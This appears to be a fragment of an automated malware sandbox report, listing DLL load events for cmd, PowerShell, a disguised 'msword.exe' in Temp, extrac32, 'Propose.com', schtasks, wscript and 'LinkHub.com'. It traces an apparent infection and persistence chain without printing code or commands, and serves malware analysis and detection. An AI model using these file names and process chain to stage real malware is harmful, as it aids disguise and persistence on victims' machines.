Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
